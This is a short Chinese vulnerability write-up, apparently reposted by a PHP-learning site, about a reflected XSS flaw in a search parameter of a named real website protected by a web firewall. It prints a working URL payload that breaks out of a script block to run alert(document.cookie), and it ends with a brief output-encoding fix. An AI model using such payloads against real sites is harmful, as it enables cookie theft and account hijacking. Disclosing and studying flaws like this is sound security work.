来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 当URL提交的参数输出在script script之间,可构造XSS跨站漏洞目标为http: www axsj net装有安全狗。http: www axsj net AX_Product SearchProductList html?kw_forIndex=aaaaaaaaa这是提交参数输出的位置在...
当URL提交的参数输出在<script></script>之间,可构造XSS跨站漏洞
目标为
http://www.axsj.net
装有安全狗。
http://www.axsj.net/AX_Product/SearchProductList.html?kw_forIndex=aaaaaaaaa
这是提交参数输出的位置
在<script></script>之间
通过实例标签可构造
http://www.axsj.net/AX_Product/SearchProductList.html?keyword_s=')</script><script>alert(document.cookie);%0A//
通过换行符注释掉后面
成功弹出Cookie
修复方案:
安全狗的话是专家,本菜鸟也不知道怎么搞!
www.axsj.net这家网站的话 对输出的数据进行html encode
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com